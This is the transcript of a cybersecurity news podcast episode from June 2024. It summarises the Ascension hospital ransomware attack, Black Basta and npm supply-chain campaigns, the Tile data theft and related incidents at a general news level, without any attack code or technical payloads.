An employee downloaded a file that led to hospital chain’s ransomware attack
Welcome to Cyber Security Today. It’s Friday June 14th, 2024. I’m Howard Solomon, contributing reporter on cybersecurity for TechNewsday.com.
 |
 |
 |
An employee downloaded a malicious file they thought was legitimate. That’s the explanation for many successful cyber attacks. The latest American organization to admit that’s how it was hit is Ascension, a hospital and senior care chain with 180 facilities in 19 states and the District of Columbia. In a statement the company said the ransomware attackers took files from seven of its 25,000 servers. Some of the stolen data may include protected health information and personally identifiable information. The data wasn’t taken from electronic health records systems. Hospitals have restored some of affected IT systems.
The group behind the Black Basta ransomware strain may have been exploiting a Windows vulnerability before it was patched last month. Researchers at Symantec say they’ve found evidence an exploit tool may have been compiled before the patch was released on March 12th. The tool was seen by Symantec in an attempted ransomware attack on an unnamed organization. The tactics used were very similar to those described by Microsoft in a recent Black Basta attack. These included the use of batch scripts masquerading as software updates.
There’s another reminder of the risk of being hit by ransomware: According to researchers at Veeam, 18 per cent of any data encrypted by ransomware won’t be recoverable. The information is part of the company’s 2024 Ransomware Trends Report. Another finding: IT departments that rush to get back online fast may also increase the odds of getting hacked again because they skip steps like making sure systems are completely clean.
Another North Korean threat actor is trying to compromise open-source applications through malicious packages on the NPM registry. According to researchers at Checkmarx, the group dubbed Moonstone Sleet is following in the footsteps of another group, dubbed Jade Sleet. Moonstone Sleet has been planting infected packages on the NPM registry since late last year. Lately their malware not only goes after Windows applications but also Linux systems. The goal of these efforts is to compromise organizations that download open-source applications. This is called a third-party attack for stealing data. Developers who download code from any open-source repository have to take care before adding it to their apps.
A crook is using a vulnerability in the PHP language to deliver ransomware. According to researchers at Imperva, the attackers are using unpatched applications with PHP scripts to upload nasty payloads. One is a .NET variant of the TellYouThePass ransomware strain. A patch for this vulnerability was released June 6th.
An AI bug bounty program has identified more vulnerabilities in open-source artificial intelligence applications. Protect AI’s latest report says there are holes in Intel’s Neural Compressor and Triton’s Inference Server. These vulnerabilities were reported at least 45 days ago. Patches may be available now.
Remember the 2019 SolarWinds hack? The one where the update mechanism of the SolarWinds Orion network management platform was compromised by alleged Russian hackers to spread a malicious update? An article this week in ProPublica quotes a former Microsoft security official saying a vulnerability in Active Directory Federation Services, which enables single-sign-on, played a role in that and other hacks. Andrew Harris is quoted as saying Microsoft didn’t want to move quickly to plug the hole by disabling ADFS. One of the alleged reasons: It might cost Microsoft the chance of getting a huge federal computing contract. In other words, it allegedly put profit before security. Harris was scheduled to testify yesterday on Capitol Hill, before this podcast was recorded.
Life360, which makes the Tile wireless device tracker to find lost or stolen keys, luggage, cars and other items, has suffered a data theft. The company says it received emails from a threat actor claiming to posess information about Tile purchasers. The data includes names, physical addresses, email addresses, phone numbers and Tile device ID numbers.
A U.S. jury has convicted a Nigerian man of being part of a conspiracy that ran a business email compromise scam. The con involved sending businesses emails that looked like they came from trusted partners like banks. Instead the messages led to the installation of data-stealing malware. After that there were follow-up emails asking victims to transfer funds to accounts the crooks controlled. The man will be sentenced August 27th. A co-conspirator pleaded guilty last month and will be sentenced in September.
How can your firm respond to disinformation? Toronto Metropolitan University’s think tank called The Dias has released a piece on what to do. It’s aimed at Canadian businesses, but it applies to companies anywhere. Among the recommendations: Have a team monitor the internet, and particularly social media, for mentions of your firm and have a response plan ready to counter misinformation.
Later tonight the Week in Review podcast will be available. Guest Terry Cutler of Cyology Labs and I will discuss the latest news on Snowflake attacks, common vulnerabilities found by a penetration test platform and cybersecurity help for American rural hospitals.
Links to details about news mentioned in this podcast episode are in the text version at TechNewsday.com.
Follow Cyber Security Today on Apple Podcasts, Spotify or add us to your Flash Briefing on your smart speaker.
